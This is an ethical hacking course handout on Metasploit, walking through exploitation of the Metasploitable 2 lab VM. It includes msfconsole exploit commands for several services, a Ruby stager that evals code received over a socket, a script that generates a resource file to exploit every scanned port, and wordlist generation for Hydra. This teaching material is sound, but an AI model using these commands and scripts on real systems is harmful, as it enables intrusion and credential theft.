En-Ethical Hacking Module 2 1.4

The document provides an overview of the Metasploit framework, detailing its components, including Msfconsole, Msfdb, and Msfvenom, and explaining how to start and utilize Metasploit for exploitation. It covers various types of exploits, payloads, and modules available within Metasploit, along with examples of exploiting different ports and services. Additionally, it touches on password cracking techniques using tools like Crunch and Hydra.

Uploaded by Shekhar Jha

Testing & Ethical Hacking
Unit 2: Ethical Hacking Phase: Exploitation
By: Dr. Sumitra
Metasploit

• Metasploit is the most widely used open-source exploitation framework. It was originally developed by HD Moore as an open source project (first released in 2003).
• It is now owned by the security company Rapid7, which also owns the vulnerability scanner Nexpose (since renamed InsightVM).
• Although originally developed as an open source project, Rapid7 now also sells a commercial Pro version of Metasploit; the open-source Metasploit Framework remains free and is what the rest of these slides use.
Components of Metasploit Framework
• Msfconsole: This is the command line interface of the Metasploit Framework. It lets you search the module database, load the required modules, set their options and run them.
• Msfdb: The Framework can use a PostgreSQL database to store the hosts, services, credentials and loot collected while scanning and exploiting, and to make module searches fast; msfdb is the helper that initialises and manages that database.
• Msfvenom: This is the tool that generates and encodes standalone payloads (it replaced the older msfpayload and msfencode tools).
How to start Metasploit

• Before we start Metasploit, we should start the PostgreSQL database.
• Metasploit will work without PostgreSQL, but the database makes module searches faster and stores the information you collect while scanning and exploiting (hosts, services, credentials).
• kali > service postgresql start
• On the first run, msfdb init creates the database and its user; inside msfconsole, db_status confirms that the console is connected to it.
Metasploit
• Exploits: Exploits are code or tools used to take advantage of vulnerabilities in software, systems, or networks.
• Metasploit included 2461 exploit modules at the time these slides were written (the count grows with every release), covering a wide range of software and systems.
• Auxiliary Modules: These modules are used for functions like scanning, information gathering, fuzzing and other actions that do not necessarily involve exploiting a vulnerability.
• Examples include port scanners, vulnerability scanners, and protocol analyzers.
Metasploit
• Post Modules: Post-exploitation modules help users perform actions after successfully gaining access to a system.
• These can include gathering system information, privilege escalation, or installing backdoors.
• Payloads: Payloads are the pieces of code executed on a target system after a successful exploit. Metasploit had 1471 payloads at the time of writing, of three kinds:
• Single Payloads: Self-contained; perform one action (e.g., execute a command or add a user) without needing anything further from the attacker.
• Stagers: Small payloads whose only job is to set up a communication channel back to the attacker (e.g., reverse_tcp) and receive a larger stage over it.
• Stages: Larger payloads (e.g., meterpreter, a full shell) delivered by a stager over the channel it opened, so their size is not limited by the exploit's buffer.
• In payload names a slash separates stage and stager (windows/meterpreter/reverse_tcp is staged), while a single payload uses an underscore (windows/shell_reverse_tcp).
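To make the stager/stage split concrete, here is an added example in Ruby (not code from the slides or from Metasploit): a minimal handler that serves a stage, and a stager that does only what Metasploit's reverse_tcp stager does, connect back, read a 4-byte length, read that many bytes and hand control to them. The stage here is Ruby source evaluated in the stager's process; the function names, the loopback port and the stage body are made up for the example.

```ruby
require "socket"

# Handler side (the attacker's listener): bind an ephemeral loopback port and,
# when the stager connects, send the stage as a 4-byte big-endian length
# followed by the stage bytes. Returns the port and a thread whose value is
# whatever the stage reports back, so the caller can wait for the result.
def serve_stage(stage_src)
  server = TCPServer.new("127.0.0.1", 0)
  port = server.addr[1]
  thread = Thread.new do
    client = server.accept
    client.write([stage_src.bytesize].pack("N") + stage_src)
    reply = client.gets&.chomp          # the stage phones home once it runs
    client.close
    server.close
    reply
  end
  [port, thread]
end

# Stager side: the only logic the exploit itself has to carry. It knows nothing
# about the stage; it fetches it over the channel it opened and runs it.
# Returns the number of stage bytes received.
def run_stager(port)
  sock = TCPSocket.new("127.0.0.1", port)
  stage_len = sock.read(4).unpack1("N")   # length prefix, network byte order
  stage_src = sock.read(stage_len)
  stage = eval(stage_src)                 # real stagers jump into the received bytes
  stage.call(sock)                        # the stage reuses the stager's socket
  sock.close
  stage_len
end

# Constructed stage: a lambda the stager never embedded itself. Single quotes
# keep the #{} literal so it is evaluated inside the stager, not here.
DEMO_STAGE = '->(io) { io.puts "stage running in pid #{Process.pid}" }'

# Full exchange: start the handler, run the stager, collect the stage's report.
def demo
  port, handler = serve_stage(DEMO_STAGE)
  sent = run_stager(port)
  [sent, handler.value]
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

The stager is a few lines and stays the same whatever stage is sent, which is why Metasploit lists many stage/stager combinations rather than one payload per task.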
Metasploit

• Encoders: Encoders transform a payload's bytes, mainly to avoid characters the exploit cannot deliver (such as null bytes) and to change the payload's signature. They were once used to evade antivirus and intrusion detection/prevention systems, but the standard encoders such as x86/shikata_ga_nai are well known to antivirus vendors, so encoding alone rarely evades detection today.
• NOPs (11): No-operation instructions are used to pad exploit payloads so that they fit a specific memory layout (a NOP sled gives the exploit a margin in where execution lands).
• Evasion (9): Evasion modules generate payloads designed to bypass security defenses, such as antivirus solutions, firewalls, or intrusion detection systems (IDS).
Metasploit
• Let's take a look at some of the console commands.
• msf > help: lists the available console commands.
• msf > use: The "use" command loads a module (e.g. use exploit/multi/misc/java_rmi_server).
• msf > show: After you load a module, the show command lists more information on the module; show options lists the settings it needs, show payloads the payloads it can carry.
• msf > info: prints the module's description, options, targets and references.
• Options are filled in with set (e.g. set rhost <target>), and the module is launched with exploit (or run).
Exploit the machine using Metasploit
• Check the IP address of my machine
• Scan the network to locate the vulnerable machine (Metasploitable 2)
• List the open ports (and service versions) on Metasploitable
• Find a vulnerability in one of those services and the Metasploit module for it
• Use that exploit: load it with use, set rhost to the target, then run exploit
Exploit using Open Port 139 (NetBIOS session service; Samba on Metasploitable 2)
Check: verify that a session was obtained (sessions -l)
Exploit using ports 512, 513 (r-services: rexec and rlogin; see Remote Shell Exploitation below)
Exploiting Port 22 (SSH)
Exploiting port 23 (TELNET)
Neither SSH nor Telnet on Metasploitable 2 needs a memory-corruption exploit: both are attacked by guessing weak credentials (see the password cracking section at the end).
Exploiting Port 80
Port 80 is open, so we type the IP address of Metasploitable 2 into our browser and notice that it is running PHP as a CGI. That version is vulnerable to PHP-CGI argument injection (CVE-2012-1823): a query string beginning with "-" is passed to the php-cgi binary as command-line options, which lets an attacker make it execute supplied code.

msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(multi/http/php_cgi_arg_injection) > set rhost 192.168.239.118
msf exploit(multi/http/php_cgi_arg_injection) > exploit

(The slides print the module name as php_arg_injection; the module in the Framework is php_cgi_arg_injection.)
Exploiting Port 1099 (Java RMI)

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. On Metasploitable 2 the RMI registry listens on port 1099, the module's default RPORT (the slide title says 8080, which is not the RMI port).
msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > set rhost 192.168.239.118
msf exploit(multi/misc/java_rmi_server) > exploit
Exploiting Port 5432 (Postgres)

The module logs in with the database's default credentials (postgres:postgres) and uses CREATE FUNCTION to load a shared library containing the payload; it fails if the default password has been changed.
msf > use exploit/linux/postgres/postgres_payload
msf exploit(linux/postgres/postgres_payload) > set rhost 192.168.239.118
msf exploit(linux/postgres/postgres_payload) > exploit
Exploiting Port 6667 (UnrealIRCd)

The UnrealIRCd 3.2.8.1 release archive was trojaned with a backdoor (CVE-2010-2075): any command starting with "AB" is passed to system(), so the module simply sends its payload that way.
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 192.168.239.118
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
Remote Shell Exploitation

The r-services on ports 512/513/514 (rexec, rlogin, rsh) authenticate by the client's claimed user name and trusted-host files (.rhosts, hosts.equiv), so when the target trusts any host a command runs without a password:

rsh -l msfadmin 192.168.239.118 ifconfig

Exploiting Distributed Ruby Remote Code Execution (8787)

Distributed Ruby (DRb) exposes Ruby objects over the network; with $SAFE left at 0 a client can call instance_eval or system on them, which this module uses to run its payload.
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(linux/misc/drb_remote_codeexec) > set rhost 192.168.239.118
msf exploit(linux/misc/drb_remote_codeexec) > exploit
Access Port 2121 (ProFTPD)

telnet 192.168.239.118 2121

This is a banner grab, not an exploit: the server answers with its ProFTPD version string, which you then look up for known vulnerabilities.


Exploiting Port 8180 (Apache Tomcat)
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.239.118
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8180
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
The module logs in to the Tomcat Manager application with the default tomcat:tomcat credentials and deploys a WAR file that contains the payload. Note that the option is rport (the slides' "rpost 8108" is a typo): Metasploitable's Tomcat listens on 8180, not the module's default 8080.
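The whole procedure above (scan, match each open port to a module, set rhost, exploit) can be driven from one Metasploit resource script. The following added example, not code from the slides or from Metasploit, is a Ruby script that parses nmap's grepable output for the target and writes such a script, using the modules the slides list. The port-to-module table, the function names and the sample scan are constructed for the example; the sample scan's version strings are abbreviated.

```ruby
# Port -> module the slides use for it, plus options that differ from the
# module defaults. Ports the slides handle by hand (22, 23, 139, 512/513,
# 2121) are deliberately absent and are reported as comments instead.
PORT_MODULES = {
  80   => { mod: "exploit/multi/http/php_cgi_arg_injection" },
  1099 => { mod: "exploit/multi/misc/java_rmi_server" },
  5432 => { mod: "exploit/linux/postgres/postgres_payload" },
  6667 => { mod: "exploit/unix/irc/unreal_ircd_3281_backdoor" },
  8180 => { mod: "exploit/multi/http/tomcat_mgr_upload",
            opts: { "RPORT" => 8180, "HttpUsername" => "tomcat", "HttpPassword" => "tomcat" } },
  8787 => { mod: "exploit/linux/misc/drb_remote_codeexec" },
}.freeze

# Constructed sample of `nmap -sV -oG - 192.168.239.118` output. In the real
# format each port entry is port/state/proto/owner/service/rpc/version/ and
# the Ports field is terminated by a tab.
SAMPLE_SCAN = <<~SCAN
  # Nmap scan initiated as: nmap -sV -oG - 192.168.239.118
  Host: 192.168.239.118 ()\tStatus: Up
  Host: 192.168.239.118 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1/, 23/open/tcp//telnet//Linux telnetd/, 80/open/tcp//http//Apache httpd 2.2.8/, 139/open/tcp//netbios-ssn//Samba smbd 3.X/, 512/open/tcp//exec//netkit-rsh rexecd/, 513/open/tcp//login///, 1099/open/tcp//java-rmi//GNU Classpath grmiregistry/, 5432/open/tcp//postgresql//PostgreSQL DB 8.3/, 6667/open/tcp//irc//UnrealIRCd/, 8180/open/tcp//http//Apache Tomcat Coyote JSP engine 1.1/, 8787/open/tcp//drb//Ruby DRb RMI/\tIgnored State: closed (977)
SCAN

ScannedPort = Struct.new(:port, :state, :proto, :service, :version)

# Parse "Host: <ip> ()<tab>Ports: ..." lines into {ip => [ScannedPort, ...]};
# the Status line and "#" comment lines are skipped.
def parse_grepable(text)
  hosts = Hash.new { |h, k| h[k] = [] }
  text.each_line do |line|
    next unless line.start_with?("Host:") && line.include?("Ports:")
    ip = line[/\AHost:\s+(\S+)/, 1]
    fields = line[/Ports:\s+(.*?)(?:\t|$)/, 1]
    fields.split(", ").each do |entry|
      port, state, proto, _owner, service, _rpc, version = entry.split("/", -1)
      hosts[ip] << ScannedPort.new(port.to_i, state, proto, service, version)
    end
  end
  hosts
end

# Emit one "use / set / exploit -j" stanza per open port we have a module for,
# and a comment for every other open port so nothing the scan found is
# silently dropped. -j backgrounds each exploit as a job so the script
# continues instead of stopping at the first interactive session.
def resource_script(hosts, lhost)
  out = []
  hosts.each do |ip, ports|
    ports.select { |p| p.state == "open" }.sort_by(&:port).each do |p|
      entry = PORT_MODULES[p.port]
      if entry.nil?
        out << "# #{ip}:#{p.port} (#{p.service}): no module in the list, handle manually"
        next
      end
      out << "use #{entry[:mod]}"
      out << "set RHOSTS #{ip}"
      (entry[:opts] || {}).each { |k, v| out << "set #{k} #{v}" }
      out << "set LHOST #{lhost}"   # every listed module defaults to a reverse payload
      out << "exploit -j"
    end
  end
  out.join("\n") + "\n"
end

if $PROGRAM_NAME == __FILE__
  scan = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_SCAN
  puts resource_script(parse_grepable(scan), ARGV[1] || "192.168.239.1")
end
```

Run as ruby msf_rc.rb scan.gnmap <your LHOST> > m2.rc and feed the result to the console with msfconsole -r m2.rc; the commented-out ports are the ones to follow up with rsh, a banner grab or Hydra as the slides describe.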
How to take a Meterpreter session
Step 1: Take a normal (command) shell on the target machine, for example with one of the exploits above.
Step 2: Background the shell session (Ctrl-Z) and upgrade it with sessions -u <id>; this runs the post/multi/manage/shell_to_meterpreter module and opens a new Meterpreter session alongside the plain shell.
How to crack passwords

CeWL: crawls a website and builds a wordlist from the words found on it (a dictionary of likely passwords for that organisation).
Crunch: generates a custom wordlist by enumerating every permutation and combination of a character set between a minimum and maximum length, for brute force (meaningless words).
Hydra: online password cracker that tries a wordlist against a network login service (SSH, Telnet, FTP, HTTP and others); xHydra is its graphical user interface.
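To show what "permutation and combination between a minimum and maximum length" means, and why the length bounds matter before a list is fed to Hydra, here is an added example in Ruby (not code from the slides or from crunch itself) that reproduces crunch's two basic modes: plain enumeration of a character set, and a pattern with placeholders. The function names and the single '@' placeholder are mine; crunch's real -t syntax has several placeholder types.

```ruby
# Number of candidates crunch would write for lengths min..max over a charset.
def candidate_count(charset, min_len, max_len)
  n = charset.chars.uniq.size
  (min_len..max_len).sum { |len| n**len }
end

# Size on disk of that list (each word plus a newline), the figure crunch
# prints before starting; the quick check of whether a length is feasible.
def wordlist_bytes(charset, min_len, max_len)
  n = charset.chars.uniq.size
  (min_len..max_len).sum { |len| n**len * (len + 1) }
end

# Enumerate every string of length min..max over the charset, shortest first
# and in charset order, like `crunch min max charset`. Yields lazily so a large
# keyspace is streamed one word at a time rather than built in memory.
def brute_force(charset, min_len, max_len)
  return enum_for(:brute_force, charset, min_len, max_len) unless block_given?
  chars = charset.chars.uniq
  (min_len..max_len).each do |len|
    chars.repeated_permutation(len).each { |tuple| yield tuple.join }
  end
end

# Pattern mode like `crunch -t pass@@`: fixed characters stay, every '@' is
# replaced by each charset character in turn. Used when part of the password
# (a company name, a year) is already known.
def pattern_words(pattern, charset)
  return enum_for(:pattern_words, pattern, charset) unless block_given?
  slots = pattern.each_char.with_index.select { |c, _| c == "@" }.map(&:last)
  charset.chars.uniq.repeated_permutation(slots.size).each do |fill|
    word = pattern.dup
    slots.each_with_index { |pos, i| word[pos] = fill[i] }
    yield word
  end
end

if $PROGRAM_NAME == __FILE__
  puts brute_force("ab", 1, 2).to_a.inspect                 # crunch 1 2 ab
  puts pattern_words("pass@@", "0123456789").first(3).inspect
  # why the bounds matter: 8 lowercase letters alone is about 1.9 TB on disk
  puts wordlist_bytes("abcdefghijklmnopqrstuvwxyz", 8, 8)
end
```

Because the keyspace grows as charset^length, a pure brute-force list is only practical for short passwords or small character sets; the pattern mode and a CeWL-style dictionary are how the search is cut down to something Hydra can try over the network in reasonable time.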